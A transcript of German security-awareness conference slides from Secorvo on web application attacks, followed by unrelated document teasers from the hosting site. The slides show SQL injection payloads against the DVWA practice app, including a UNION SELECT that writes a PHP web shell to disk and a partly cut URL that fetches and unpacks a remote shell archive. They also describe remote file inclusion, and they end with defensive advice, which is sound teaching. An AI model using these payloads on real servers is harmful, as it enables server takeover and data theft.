Echte Zauberei oder billige Tricks?
|
|
- Arnim Sauer
- vor 8 Jahren
- Abrufe
Transkript
1 ? 3. Tag der IT-Sicherheit Kai Jendrian + Klaus J. Mueller Angriffe auf Webanwendungen sind allüberall gegenwärtig. Handelt es sich hierbei um echte Zauberei, gegen die kein Kraut gewachsen ist oder sind es am Ende doch nur billige Tricks, gegen die man sich wirksam schützen kann - wenn man sie denn nur durchschaut hat? Secorvo Security Consulting GmbH, Karlsruhe Seite 1
2 Secorvo Security Consulting GmbH, Karlsruhe Seite 2
3 Ein Blick in die aktuelle Presse: Prominente Firmen wurden über Schwachstellen in Web-Anwendungen angegriffen. Siehe: html URL-Manipulation html html html Secorvo Security Consulting GmbH, Karlsruhe Seite 3
4 Secorvo Security Consulting GmbH, Karlsruhe Seite 4
5 Die prominenten Beispiele sind nur die Spitze des Eisberges. Im Netz finden sich unzählige weitere Beispiele für Schwachstellen in Web-Anwendungen. Siehe: Secorvo Security Consulting GmbH, Karlsruhe Seite 5
6 Die Sicherheit von Webanwendungen geht alle an! Wer auch immer mit der Entwicklung oder dem Betrieb von Webanwendungen zu tun hat, muss sich um Sicherheit kümmern! Secorvo Security Consulting GmbH, Karlsruhe Seite 6
7 Für ein besseres Verständnis der Herausforderung "Sicherheit von Webanwendungen" schauen wir uns einige Angriffs-Tricks mal etwas genauer an! Secorvo Security Consulting GmbH, Karlsruhe Seite 7
8 SQL-Injection Der erste "Trick" ist die SQL-Injection. Hierbei spricht man auch gerne von den Kakerlaken der Webanwendungen. Man macht eine Kakerlake platt und hunderte neue kommen aus ihren Löchern! Siehe: Secorvo Security Consulting GmbH, Karlsruhe Seite 8
9 2 3. Tag der IT-Sicherheit $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) SELECT first_name, last_name FROM users WHERE user_id = '2' Hier ein Beispiel für den Ablauf einer Abfrage in einer Webanwendung. In das Formularfeld "User ID:" wird durch den Benutzer der Wert 2 eingetippt. Dieser Wert wird durch PHP-Code in einer Webanwendung in eine Zeichenkette eingefügt, der eine Abfrage an einen Datenbankserver repräsentiert. Diese Zeichenkette wird durch die Anwendung an die Datenbank übergeben. Im unteren Abschnitt ist dargestellt, welche SQL-Abfrage die Datenbank zu Gesicht bekommt und ausführt. An dieser Stelle sind auf den ersten Blick keine Auffälligkeiten zu erkennen. Secorvo Security Consulting GmbH, Karlsruhe Seite 9
10 Die Ausgabe sieht auch unverdächtig aus, es wurde der gewünschte Datensatz mit der User-ID 2 ausgewählt. Secorvo Security Consulting GmbH, Karlsruhe Seite 10
11 Soweit scheint an dieser Stelle noch alles im grünen Bereich. Secorvo Security Consulting GmbH, Karlsruhe Seite 11
12 Aber was passiert, wenn wir dem Magier noch etwas genauer auf die Finger schauen? Secorvo Security Consulting GmbH, Karlsruhe Seite 12
13 2' OR '1'='1 3. Tag der IT-Sicherheit $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) SELECT FROM first_name, last_name users WHERE ( user_id = '2') OR ('1'='1') Das Szenario ist wieder das gleiche. Nur tippt der kreative Benutzer jetzt einen zunächst scheinbar unsinnigen Wert in das Feld ein. Dieser Wert wird unverändert durch die Webanwendung in eine Zeichenkette eingebaut und an die Datenbank übergeben. Und hier offenbart sich der Trick: Wenn man genau hinschaut, kann man erkennen, dass durch das erste einzelne Hochkomma in der Eingabe der erste Teil der Prüfung in der Datenbankabfrage abgeschlossen wird und mit dem Rest der Eingabe eine zusätzliche Prüfung angefügt wird. Gemein an dieser Stelle ist, dass durch diese zusätzliche Abfrage die Prüfung immer einen wahren Wert zurückliefert. Hier ist Vorsicht angesagt! Diese Art von SQL-Injection kann beispielsweise auch zur Umgehung von schlecht realisierten Anmeldeformularen von Webanwendungen genutzt werden. Secorvo Security Consulting GmbH, Karlsruhe Seite 13
14 Das Ergebnis der manipulierten Abfrage sieht schon nicht mehr aus wie gewünscht! Secorvo Security Consulting GmbH, Karlsruhe Seite 14
15 Dieser Angriff alleine ist schon gefährlich! Aber es kann noch schlimmer kommen! Secorvo Security Consulting GmbH, Karlsruhe Seite 15
16 Ein noch tieferer Blick in die Trickkiste offenbart das wahre Übel! Secorvo Security Consulting GmbH, Karlsruhe Seite 16
17 -1' UNION SELECT "? system($_request['cmd']);?>", '' INTO OUTFILE '/srv/www/sites/dvwa/hack.php 3. Tag der IT-Sicherheit $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) SELECT FROM first_name, last_name users WHERE user_id = '-1' UNION SELECT "? system($_request['cmd']);?>", '' INTO OUTFILE '/srv/www/sites/dvwa/hack.php' Das Szenario ist noch einmal das gleiche. Nur tippt der kreative Benutzer jetzt noch unsinniger scheinende Werte in das Feld ein. Dieser Wert wird wiederum unverändert durch die Webanwendung in eine Zeichenkette eingebaut und an die Datenbank übergeben. Auch in diesem Fall wird die Prüfung in der SQL-Abfrage durch das erste einzelne Hochkomma erst einmal abgeschlossen. Nun wird allerdings hier nicht die Prüfung verändert, sondern durch den SQL-Befehl UNION wird eine zweite Abfrage an die erste angeschlossen. Durch den Wert 234 wurde im konkreten Fall sichergestellt, dass die erste Abfrage keinen Wert zurückliefert. Mit dem zweiten SQL-Konstrukt wird PHP-Code in eine Datei im Kontext der Anwendung geschrieben. Dieser PHP-Code ermöglicht, über einen Aufruf einer Web-Seite auf dem Web-Server beliebige Programme aufzurufen. Nun kann durch folgenden Beispielaufruf ein Angreifer eine präparierte Webseite nutzen, um eine komplette Shell auf dem Opferserver zu installieren. Diese kann er komfortabel durch seinen Browser kontrollieren. Hier der Beispielaufruf: O%20/srv/www/sites/dvwa/phpshell.tar%20http:// ar%20-c%20/srv/www/sites/dvwa%20-xf%20/srv/www/sites/dvwa/phpshell.tar Siehe auch: PS: Im konkreten Fall wurde der Umweg über ein UNION zur Abfrage von mehreren SQL- Kommandos verwendet, da der PHP-Befehl mysql_query die Ausführung von mehreren durch ein Semikolon getrennten SQL-Befehlen nicht unterstützt. In Umgebungen, wo die entsprechende Sprache dieses Konstrukt erlaubt, kann der Server noch deutlich einfacher über die Verwendung von INSERT, UPDATE oder DELETE sowie u. U. der direkten Ausführung von externen Programmen durch Prozeduren angegriffen werden. Secorvo Security Consulting GmbH, Karlsruhe Seite 17
18 Der Server des Opfers kann nun komfortabel durch den Browser vollständig kontrolliert werden! Secorvo Security Consulting GmbH, Karlsruhe Seite 18
19 Noch schlimmer geht es eigentlich nicht. So kann eine SQL-Injection zur vollständigen Übernahme eines Servers führen! Secorvo Security Consulting GmbH, Karlsruhe Seite 19
20 Ein zweiter Griff in die Trickkiste Secorvo Security Consulting GmbH, Karlsruhe Seite 20
21 Remote File Inclusion 3. Tag der IT-Sicherheit Darf ich mal kurz Ihren Server benutzen? würden Sie diesem freundlichen Herrn gestatten, seine Programme auf Ihrem Server zu installieren? Bei einer Remote File Inclusion -Schwachstelle erlauben Sie genau das: wildfremde Besucher Ihrer Webseite können Ihre eigenen (Schad-)Programme auf Ihrem Server ausführen sehen Sie selbst! Secorvo Security Consulting GmbH, Karlsruhe Seite 21
22 Auf der ersten Blick eine normale Webseite mit einer Liste der unternehmensinternen Ansprechpartner für Kunden mit Name und Mailadresse. Secorvo Security Consulting GmbH, Karlsruhe Seite 22
23 Sieht alles gut aus genau so war s gedacht. Secorvo Security Consulting GmbH, Karlsruhe Seite 23
24 Wollen wir doch mal schauen, was der Zauberer aus dem Hut holt Secorvo Security Consulting GmbH, Karlsruhe Seite 24
25 Die Ausgabe der Ansprechpartner wird über die Einbindung eines kleinen Programms realisiert, in welchem die Parameter angegeben werden, die auf der Webseite ausgegeben werden sollen. Secorvo Security Consulting GmbH, Karlsruhe Seite 25
26 Dummerweise aber wird auf dem Server nicht geprüft, wo die einzubindende Datei liegt. Eigentlich sollte diese auf dem Server selbst liegen. Was aber passiert, wenn nun an Stelle der eigentlichen Datei eine andere verwendet wird, in der weitere Felder übergeben werden? Zum Beispiel die direkte Telefondurchwahl? Dann wird diese auch angezeigt Dabei wird das Programm ( liste.php ) durch eines ersetzt, welches der Angreifer auf seinem Server im Internet abgelegt hat. Er muss lediglich den Namen des ursprünglichen Programms durch die Adresse ersetzen, an der sein Programm zu finden ist, also: liste.php durch und schon kann er seine eigenen Programme auf Ihrem Server ausführen! Secorvo Security Consulting GmbH, Karlsruhe Seite 26
27 Die Ausgabe der internen Telefondurchwahlnummern ist schon sehr unangenehm aber es kommt noch schlimmer Secorvo Security Consulting GmbH, Karlsruhe Seite 27
28 sehen Sie genau hin Secorvo Security Consulting GmbH, Karlsruhe Seite 28
29 Das Programm wird nun um zusätzliche Felder erweitert; die Namen der Felder werden geraten der Angreifer hat ja beliebig viele Versuche und auch Zeit zur Verfügung. Secorvo Security Consulting GmbH, Karlsruhe Seite 29
30 Durch das Hinzufügen weiterer Spalten wird der angegriffene Server plötzlich so gesprächig, dass er auch die Dauer der Betriebszugehörigkeit und die Jahresgehälter der Mitarbeiter ausplaudert! Secorvo Security Consulting GmbH, Karlsruhe Seite 30
31 Der Angreifer kann also seine eigenen Programme auf dem angegriffenen Server ausführen, ohne dass dies dem Serverbetreiber auffällt! Auf die gleiche Weise lassen sich so nicht nur interne Informationen ausgeben, sondern auch beliebige andere Programme starten, die für das weitere Ausforschen der Datenbestände auf dem Opfer-Server nützlich sein können. Der Server gelangt so unter die vollständige Kontrolle des Angreifers! Secorvo Security Consulting GmbH, Karlsruhe Seite 31
32 Nachdem die Tricks der Angriffe entzaubert worden sind, stellt sich die Frage, was man tun kann, um sich selbst dagegen zu schützen. Secorvo Security Consulting GmbH, Karlsruhe Seite 32
33 Secorvo Security Consulting GmbH, Karlsruhe Seite 33
34 INPUT VALIDATION 3. Tag der IT-Sicherheit DIE WICHTIGSTE REGEL FÜR WEBANWENDUNGEN: KONTROLLIEREN SIE IMMER ALLE EINGABEN!!! Siehe: Secorvo Security Consulting GmbH, Karlsruhe Seite 34
35 Darüber hinaus gibt es viele Punkte, die für die Sicherheit von Webanwendungen relevant sind. Es ist empfehlenswert, sich mit diesen Punkten ausführlich auseinanderzusetzen. Dabei sind alle Phasen der Software-Entwicklung betroffen: Anforderungsanalyse Entwurf Implementierung Testing & QA Roll-Out Betrieb Wartung und Incident-Management Siehe: Professional/dp/ X Secorvo Security Consulting GmbH, Karlsruhe Seite 35
36 Nichts ist lehrreicher, als eigene Erfahrungen zu sammeln. Das Experimentieren mit Webanwendungen liefert wertvolle Erkenntnisse. Zum Einstieg bietet sich folgender Experimentierkasten an: Secorvo Security Consulting GmbH, Karlsruhe Seite 36
37 Tauschen Sie sich mit Anderen aus; lernen Sie, wie Sie die Sicherheit Ihrer Webanwendungen verbessern können. Hierzu bieten sich Seminare, Konferenzen, Organisationen aber auch lokale Zusammenschlüsse von interessierten Menschen an. Siehe: Secorvo Security Consulting GmbH, Karlsruhe Seite 37
38 Jetzt müssen Sie nur noch handeln! Secorvo Security Consulting GmbH, Karlsruhe Seite 38
39 / klaus.j.mueller@secorvo.de Secorvo Security Consulting GmbH, Karlsruhe Seite 39
40 Bildquellen Folie 01: [2006] Stephen Coburn, bigstockphoto.com Folie 02: [2010] Scott Griessel, bigstockphoto.com Folie 04: [2009] Richard Lindie, bigstockphoto.com Folie 06: [2011] Aleksandar Kosev, bigstockphoto.com Folie 07: [2010] Dmitriy Shironosov, bigstockphoto.com Folie 08: [2009] Mau Kae Horng, bigstockphoto.com Folie 11: [2010] timurock, bigstockphoto.com Folie 12: [2007] Vincent Giordano, bigstockphoto.com Folie 15: [2010] timurock, bigstockphoto.com Folie 19: [2010] timurock, bigstockphoto.com Folie 21: [2010] Ron Sumners, bigstockphoto.com Folie 32: [2011] Poznyakov Gennadiy, bigstockphoto.com Folie 33: [2011] Kai Jendrian Folie 35: [2008] Dmitriy Shironosov,bigstockphoto.com Folie 36: [2009] BlueOrange Studio, bigstockphoto.com Folie 37: [2008] Edgard Rodriguez, bigstockphoto.com Folie 38: [2008] Mykola Troitskyy, bigstockphoto.com Folie 39: [2006] Jon Helgason, bigstockphoto.com 3. Tag der IT-Sicherheit Bildquellen Folie 01: [2006] Stephen Coburn, bigstockphoto.com Folie 02: [2010] Scott Griessel, bigstockphoto.com Folie 04: [2009] Richard Lindie, bigstockphoto.com Folie 06: [2011] Aleksandar Kosev, bigstockphoto.com Folie 07: [2010] Dmitriy Shironosov, bigstockphoto.com Folie 08: [2009] Mau Kae Horng, bigstockphoto.com Folie 11: [2010] timurock, bigstockphoto.com Folie 12: [2007] Vincent Giordano, bigstockphoto.com Folie 15: [2010] timurock, bigstockphoto.com Folie 19: [2010] timurock, bigstockphoto.com Folie 21: [2010] Ron Sumners, bigstockphoto.com Folie 32: [2011] Poznyakov Gennadiy, bigstockphoto.com Folie 33: [2011] Kai Jendrian Folie 35: [2008] Dmitriy Shironosov,bigstockphoto.com Folie 36: [2009] BlueOrange Studio, bigstockphoto.com Folie 37: [2008] Edgard Rodriguez, bigstockphoto.com Folie 38: [2008] Mykola Troitskyy, bigstockphoto.com Folie 39: [2006] Jon Helgason, bigstockphoto.com Secorvo Security Consulting GmbH, Karlsruhe Seite 40
mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank
mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man
MehrWeb-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel>
Web-Sicherheit: Kein fauler Zauber?! Security Consulting GmbH, Karlsruhe Seite 1 Security Consulting GmbH, Karlsruhe Seite 2 Security Consulting GmbH, Karlsruhe Seite 3 Security
MehrAnleitung über den Umgang mit Schildern
Anleitung über den Umgang mit Schildern -Vorwort -Wo bekommt man Schilder? -Wo und wie speichert man die Schilder? -Wie füge ich die Schilder in meinen Track ein? -Welche Bauteile kann man noch für Schilder
MehrInternationales Altkatholisches Laienforum
Internationales Altkatholisches Laienforum Schritt für Schritt Anleitung für die Einrichtung eines Accounts auf admin.laienforum.info Hier erklären wir, wie ein Account im registrierten Bereich eingerichtet
MehrLineargleichungssysteme: Additions-/ Subtraktionsverfahren
Lineargleichungssysteme: Additions-/ Subtraktionsverfahren W. Kippels 22. Februar 2014 Inhaltsverzeichnis 1 Einleitung 2 2 Lineargleichungssysteme zweiten Grades 2 3 Lineargleichungssysteme höheren als
MehrProfessionelle Seminare im Bereich MS-Office
Der Name BEREICH.VERSCHIEBEN() ist etwas unglücklich gewählt. Man kann mit der Funktion Bereiche zwar verschieben, man kann Bereiche aber auch verkleinern oder vergrößern. Besser wäre es, die Funktion
MehrNicht kopieren. Der neue Report von: Stefan Ploberger. 1. Ausgabe 2003
Nicht kopieren Der neue Report von: Stefan Ploberger 1. Ausgabe 2003 Herausgeber: Verlag Ploberger & Partner 2003 by: Stefan Ploberger Verlag Ploberger & Partner, Postfach 11 46, D-82065 Baierbrunn Tel.
MehrWindows. Workshop Internet-Explorer: Arbeiten mit Favoriten, Teil 1
Workshop Internet-Explorer: Arbeiten mit Favoriten, Teil 1 Wenn der Name nicht gerade www.buch.de oder www.bmw.de heißt, sind Internetadressen oft schwer zu merken Deshalb ist es sinnvoll, die Adressen
MehrWenn man nach Beendigung der WINDOWS-SICHERUNG folgendes angezeigt bekommt
1. Für alle, die mit wenig zufrieden sind Wenn man nach Beendigung der WINDOWS-SICHERUNG folgendes angezeigt bekommt Bild 1 bekommt man erst mal einen Schreck. Die Meldung wurden nicht gesichert beunruhigt,
MehrReporting Services und SharePoint 2010 Teil 1
Reporting Services und SharePoint 2010 Teil 1 Abstract Bei der Verwendung der Reporting Services in Zusammenhang mit SharePoint 2010 stellt sich immer wieder die Frage bei der Installation: Wo und Wie?
MehrWir machen neue Politik für Baden-Württemberg
Wir machen neue Politik für Baden-Württemberg Am 27. März 2011 haben die Menschen in Baden-Württemberg gewählt. Sie wollten eine andere Politik als vorher. Die Menschen haben die GRÜNEN und die SPD in
MehrEine eigene Seite auf Facebook-Fanseiten einbinden und mit einem Tab verbinden.
Eine eigene Seite auf Facebook-Fanseiten einbinden und mit einem Tab verbinden. Nach den Änderungen die Facebook vorgenommen hat ist es einfacher und auch schwerer geworden eigene Seiten einzubinden und
MehrM@school Software- und Druckerzuweisung Selbstlernmaterialien
Bildung und Sport M@school Software- und Druckerzuweisung Selbstlernmaterialien Hinweise zum Skript: LMK = Linker Mausklick RMK = Rechter Mausklick LMT = Linke Maustaste RMT = Rechte Maustaste Um die Lesbarkeit
MehrP&P Software - Adressexport an Outlook 05/29/16 14:44:26
Adressexport an Outlook Wozu? Aus EASY können viele Daten im Excelformat ausgegeben werden. Diese Funktion kann zum Beispiel zum Export von Lieferantenadressen an Outlook genutzt werden. Hinweis Wir können
MehrAGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b
AGROPLUS Buchhaltung Daten-Server und Sicherheitskopie Version vom 21.10.2013b 3a) Der Daten-Server Modus und der Tresor Der Daten-Server ist eine Betriebsart welche dem Nutzer eine grosse Flexibilität
MehrHandbuch. TMBackup R3
Handbuch TMBackup R3 Ersteller: EWERK Medical Care GmbH Erstellungsdatum: 05.06.2013 S. 1 Inhalt 1 Vorwort... 3 2 Installation... 3 2.1 Voraussetzungen... 3 2.2 Installation... 3 3 Einstellungen... 4 3.1
MehrProfessionelle Seminare im Bereich MS-Office
Serienbrief aus Outlook heraus Schritt 1 Zuerst sollten Sie die Kontakte einblenden, damit Ihnen der Seriendruck zur Verfügung steht. Schritt 2 Danach wählen Sie bitte Gerhard Grünholz 1 Schritt 3 Es öffnet
MehrZwischenablage (Bilder, Texte,...)
Zwischenablage was ist das? Informationen über. die Bedeutung der Windows-Zwischenablage Kopieren und Einfügen mit der Zwischenablage Vermeiden von Fehlern beim Arbeiten mit der Zwischenablage Bei diesen
MehrAnleitung zur Daten zur Datensicherung und Datenrücksicherung. Datensicherung
Anleitung zur Daten zur Datensicherung und Datenrücksicherung Datensicherung Es gibt drei Möglichkeiten der Datensicherung. Zwei davon sind in Ges eingebaut, die dritte ist eine manuelle Möglichkeit. In
MehrWebalizer HOWTO. Stand: 18.06.2012
Webalizer HOWTO Stand: 18.06.2012 Copyright 2003 by manitu. Alle Rechte vorbehalten. Alle verwendeten Bezeichnungen dienen lediglich der Kennzeichnung und können z.t. eingetragene Warenzeichen sein, ohne
Mehrwww.computeria-olten.ch Monatstreff für Menschen ab 50 Temporäre Dateien / Browserverlauf löschen / Cookies
www.computeria-olten.ch Monatstreff für Menschen ab 50 Merkblatt 42 Temporäre Dateien / Browserverlauf löschen / Cookies Im Internet-Explorer Extras / Browserverlauf löschen Jetzt entscheiden, was man
MehrPapa - was ist American Dream?
Papa - was ist American Dream? Das heißt Amerikanischer Traum. Ja, das weiß ich, aber was heißt das? Der [wpseo]amerikanische Traum[/wpseo] heißt, dass jeder Mensch allein durch harte Arbeit und Willenskraft
MehrMind Mapping am PC. für Präsentationen, Vorträge, Selbstmanagement. von Isolde Kommer, Helmut Reinke. 1. Auflage. Hanser München 1999
Mind Mapping am PC für Präsentationen, Vorträge, Selbstmanagement von Isolde Kommer, Helmut Reinke 1. Auflage Hanser München 1999 Verlag C.H. Beck im Internet: www.beck.de ISBN 978 3 446 21222 0 schnell
MehrHilfedatei der Oden$-Börse Stand Juni 2014
Hilfedatei der Oden$-Börse Stand Juni 2014 Inhalt 1. Einleitung... 2 2. Die Anmeldung... 2 2.1 Die Erstregistrierung... 3 2.2 Die Mitgliedsnummer anfordern... 4 3. Die Funktionen für Nutzer... 5 3.1 Arbeiten
MehrGEONET Anleitung für Web-Autoren
GEONET Anleitung für Web-Autoren Alfred Wassermann Universität Bayreuth Alfred.Wassermann@uni-bayreuth.de 5. Mai 1999 Inhaltsverzeichnis 1 Technische Voraussetzungen 1 2 JAVA-Programme in HTML-Seiten verwenden
MehrSpeicher in der Cloud
Speicher in der Cloud Kostenbremse, Sicherheitsrisiko oder Basis für die unternehmensweite Kollaboration? von Cornelius Höchel-Winter 2013 ComConsult Research GmbH, Aachen 3 SYNCHRONISATION TEUFELSZEUG
MehrAdvoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank
Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank Die Entscheidung Advoware über VPN direkt auf dem lokalen PC / Netzwerk mit Zugriff auf die Datenbank des zentralen Servers am anderen
MehrKapitel 4 Die Datenbank Kuchenbestellung Seite 1
Kapitel 4 Die Datenbank Kuchenbestellung Seite 1 4 Die Datenbank Kuchenbestellung In diesem Kapitel werde ich die Theorie aus Kapitel 2 Die Datenbank Buchausleihe an Hand einer weiteren Datenbank Kuchenbestellung
MehrStellen Sie bitte den Cursor in die Spalte B2 und rufen die Funktion Sverweis auf. Es öffnet sich folgendes Dialogfenster
Es gibt in Excel unter anderem die so genannten Suchfunktionen / Matrixfunktionen Damit können Sie Werte innerhalb eines bestimmten Bereichs suchen. Als Beispiel möchte ich die Funktion Sverweis zeigen.
MehrOutlook. sysplus.ch outlook - mail-grundlagen Seite 1/8. Mail-Grundlagen. Posteingang
sysplus.ch outlook - mail-grundlagen Seite 1/8 Outlook Mail-Grundlagen Posteingang Es gibt verschiedene Möglichkeiten, um zum Posteingang zu gelangen. Man kann links im Outlook-Fenster auf die Schaltfläche
Mehrhttp://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0
http://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0 Drucken von Webseiten Autor: Christian Heisch Technischer Verantwortlicher für die Webseitenumsetzung bei
MehrL10N-Manager 3. Netzwerktreffen der Hochschulübersetzer/i nnen Mannheim 10. Mai 2016
L10N-Manager 3. Netzwerktreffen der Hochschulübersetzer/i nnen Mannheim 10. Mai 2016 Referentin: Dr. Kelly Neudorfer Universität Hohenheim Was wir jetzt besprechen werden ist eine Frage, mit denen viele
MehrWindows Server 2012 RC2 konfigurieren
Windows Server 2012 RC2 konfigurieren Kurzanleitung um einen Windows Server 2012 als Primären Domänencontroller einzurichten. Vorbereitung und Voraussetzungen In NT 4 Zeiten, konnte man bei der Installation
MehrPersönliche Zukunftsplanung mit Menschen, denen nicht zugetraut wird, dass sie für sich selbst sprechen können Von Susanne Göbel und Josef Ströbl
Persönliche Zukunftsplanung mit Menschen, denen nicht zugetraut Von Susanne Göbel und Josef Ströbl Die Ideen der Persönlichen Zukunftsplanung stammen aus Nordamerika. Dort werden Zukunftsplanungen schon
MehrDer Gabelstapler: Wie? Was? Wer? Wo?
Schreibkompetenz 16: schlusszeichen (Fragezeichen) sprechen zeichen Um eine Frage zu kennzeichnen, wird ein Fragezeichen (?) gesetzt. Fragewörter (zum Beispiel wo, wer, was, wie) zeigen an, dass ein Fragezeichen
Mehr1. Einführung. 2. Alternativen zu eigenen Auswertungen. 3. Erstellen eigener Tabellen-Auswertungen
1. Einführung Über die Tabellen-Auswertungen können Sie eigene Auswertungen nach Ihren Wünschen erstellen. Diese Auswertungen werden immer anhand der aktuellen Daten aus orgamax ermittelt, Sie können also
MehrJederzeit Ordnung halten
Kapitel Jederzeit Ordnung halten 6 auf Ihrem Mac In diesem Buch war bereits einige Male vom Finder die Rede. Dieses Kapitel wird sich nun ausführlich diesem so wichtigen Programm widmen. Sie werden das
MehrWie halte ich Ordnung auf meiner Festplatte?
Wie halte ich Ordnung auf meiner Festplatte? Was hältst du von folgender Ordnung? Du hast zu Hause einen Schrank. Alles was dir im Wege ist, Zeitungen, Briefe, schmutzige Wäsche, Essensreste, Küchenabfälle,
Mehr1 topologisches Sortieren
Wolfgang Hönig / Andreas Ecke WS 09/0 topologisches Sortieren. Überblick. Solange noch Knoten vorhanden: a) Suche Knoten v, zu dem keine Kante führt (Falls nicht vorhanden keine topologische Sortierung
MehrTYPO3 Tipps und Tricks
TYPO3 Tipps und Tricks Seiten als Shortcut. Hiermit ist gemeint, dass eine Oberseite direkt auf eine tiefere Unterseite verlinkt. Dies kann bei Themen ohne gesonderte Übersichtsseite hilfreich sein. Zum
MehrAlle Schlüssel-Karten (blaue Rückseite) werden den Schlüssel-Farben nach sortiert und in vier getrennte Stapel mit der Bildseite nach oben gelegt.
Gentlemen", bitte zur Kasse! Ravensburger Spiele Nr. 01 264 0 Autoren: Wolfgang Kramer und Jürgen P. K. Grunau Grafik: Erhard Dietl Ein Gaunerspiel für 3-6 Gentlemen" ab 10 Jahren Inhalt: 35 Tresor-Karten
MehrDas DAAD-PORTAL. Prozess der Antragstellung in dem SAPbasierten Bewerbungsportal des DAAD.
Das DAAD-PORTAL Prozess der Antragstellung in dem SAPbasierten Bewerbungsportal des DAAD. November 2012 Man findet das neue Portal auf der Webseite vom DAAD : www.daad.de/ Danach erscheint ein neues Fenster,
MehrMenü auf zwei Module verteilt (Joomla 3.4.0)
Menü auf zwei Module verteilt (Joomla 3.4.0) Oft wird bei Joomla das Menü in einem Modul dargestellt, wenn Sie aber z.b. ein horizontales Hauptmenü mit einem vertikalen Untermenü machen möchten, dann finden
MehrGeld Verdienen im Internet leicht gemacht
Geld Verdienen im Internet leicht gemacht Hallo, Sie haben sich dieses E-book wahrscheinlich herunter geladen, weil Sie gerne lernen würden wie sie im Internet Geld verdienen können, oder? Denn genau das
MehrDas sogenannte Beamen ist auch in EEP möglich ohne das Zusatzprogramm Beamer. Zwar etwas umständlicher aber es funktioniert
Beamen in EEP Das sogenannte Beamen ist auch in EEP möglich ohne das Zusatzprogramm Beamer. Zwar etwas umständlicher aber es funktioniert Zuerst musst du dir 2 Programme besorgen und zwar: Albert, das
MehrWordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten
Wordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten Version 1.0 Wordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten In unserer Anleitung zeigen wir Dir, wie Du Blogbeiträge
MehrSQL-Injection. Seite 1 / 16
SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection
MehrInternet online Update (Mozilla Firefox)
Um Ihr Consoir Beta immer schnell und umkompliziert auf den aktuellsten Stand zu bringen, bieten wir allen Kunden ein Internet Update an. Öffnen Sie Ihren Mozilla Firefox und gehen auf unsere Internetseite:
MehrKurzübericht der implementierten Funktionen der Fachinformatiker -== Info Datenbank ==-
Kurzübericht der implementierten Funktionen der Fachinformatiker -== Info Datenbank ==- Einleitung : Zu Beginn möchte ich kurz den Sinn dieser Datenbank erläutern. Als Webmaster der Fachinformatiker -==
MehrErstellen von x-y-diagrammen in OpenOffice.calc
Erstellen von x-y-diagrammen in OpenOffice.calc In dieser kleinen Anleitung geht es nur darum, aus einer bestehenden Tabelle ein x-y-diagramm zu erzeugen. D.h. es müssen in der Tabelle mindestens zwei
MehrInformationsblatt Induktionsbeweis
Sommer 015 Informationsblatt Induktionsbeweis 31. März 015 Motivation Die vollständige Induktion ist ein wichtiges Beweisverfahren in der Informatik. Sie wird häufig dazu gebraucht, um mathematische Formeln
MehrBedienungsanleitung Anlassteilnehmer (Vereinslisten)
Bedienungsanleitung Anlassteilnehmer Dieses Programm ist speziell für Vereine entworfen. Es ist lizenzfrei verwendbar und gratis. Das Programm ist mit Excel 2010 erstellt worden und enthält VBA Programmierungen,
MehrAnleitung, WebRecherche
1 Warum dieses Programm? Anleitung, WebRecherche Wer kennt es nicht: Man will möglichst viele Informationen zu einem Thema oder einem Produkt sammeln. Also entsprechende Suchbegriffe in die Suchmaschine
MehrDoku zur Gebäudebrüter Datenbank
Autor: Christina Baradari, christina.baradari@berlin.de, 0162 2008 114 Doku zur Gebäudebrüter Datenbank Team Web Programmierer: Rahim Baradari Inhaltsverzeichnis 1 Suchen nach Kartierungsdaten... 2 1.1
MehrMehr Geld verdienen! Lesen Sie... Peter von Karst. Ihre Leseprobe. der schlüssel zum leben. So gehen Sie konkret vor!
Peter von Karst Mehr Geld verdienen! So gehen Sie konkret vor! Ihre Leseprobe Lesen Sie...... wie Sie mit wenigen, aber effektiven Schritten Ihre gesteckten Ziele erreichen.... wie Sie die richtigen Entscheidungen
MehrQualität und Verlässlichkeit Das verstehen die Deutschen unter Geschäftsmoral!
Beitrag: 1:43 Minuten Anmoderationsvorschlag: Unseriöse Internetanbieter, falsch deklarierte Lebensmittel oder die jüngsten ADAC-Skandale. Solche Fälle mit einer doch eher fragwürdigen Geschäftsmoral gibt
MehrStand: 28.11.2012. Adressnummern ändern Modulbeschreibung
Seite 1 Inhalt Allgemein...3 Installation...3 manuelle Eingabe von alten und neuen Adressnummern...4 Vorbereiten von Adressnummern-Änderungen in Tabellen...5 Seite 2 Allgemein Das INKS-Modul ermöglicht
MehrWir machen uns stark! Parlament der Ausgegrenzten 20.-22.9.2013
Wir machen uns stark! Parlament der Ausgegrenzten 20.-22.9.2013 Die Armutskonferenz Einladung zum Parlament der Ausgegrenzten 20.-22. September 2013 Was ist das Parlament der Ausgegrenzten? Das Parlament
MehrSchrittweise Anleitung zur Erstellung einer Angebotseite 1. In Ihrem Dashboard klicken Sie auf Neu anlegen, um eine neue Seite zu erstellen.
Schrittweise Anleitung zur Erstellung einer Angebotseite 1. In Ihrem Dashboard klicken Sie auf Neu anlegen, um eine neue Seite zu erstellen. Klicken Sie auf Neu anlegen, um Ihre neue Angebotseite zu erstellen..
MehrTipps und Tricks zu den Updates
Tipps und Tricks zu den Updates Grundsätzlich können Sie Updates immer auf 2 Wegen herunterladen, zum einen direkt über unsere Internetseite, zum anderen aus unserer email zu einem aktuellen Update. Wenn
MehrTragen Sie bitte im Anmeldefeld die Daten ein, die Sie von uns erhalten haben.
